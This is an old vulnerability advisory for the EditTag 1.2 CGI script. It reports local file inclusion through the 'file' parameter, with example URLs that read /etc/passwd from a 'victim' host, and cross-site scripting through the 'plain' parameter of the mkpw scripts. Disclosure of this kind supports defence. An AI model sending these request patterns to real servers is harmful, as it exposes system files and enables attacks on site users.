Multiple bugs in EditTag

2007-01-06T00:00:00
ID SECURITYVULNS:DOC:15602
Type securityvulns
Reporter Securityvulns
Modified 2007-01-06T00:00:00

Description

Script: EditTag Version: 1.2 Author: Greg Billock (dmacewen@isn.net) Discoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir)

I am sorry for my BAD English.

Description:

1) Local file injection: An attacker can use edittag.cgi or edittag_mp.cgi (maybe .pl) to inject files (ex. /etc/passwd)

http://www.victim/edittag/edittag.cgi?file=INJECT http://www.victim/edittag/edittag.pl?file=INJECT http://www.victim/edittag/edittag_mp.cgi?file=INJECT http://www.victim/edittag/edittag_mp.pl?file=INJECT

ex. http://www.victim/edittag/edittag_mp.pl?file=/etc/passwd

2)XSS

http://www.victim/edittag/mkpw_mp.cgi?plain=XSS http://www.victim/edittag/mkpw.pl?plain=XSS http://www.victim/edittag/mkpw.cgi?plain=XSS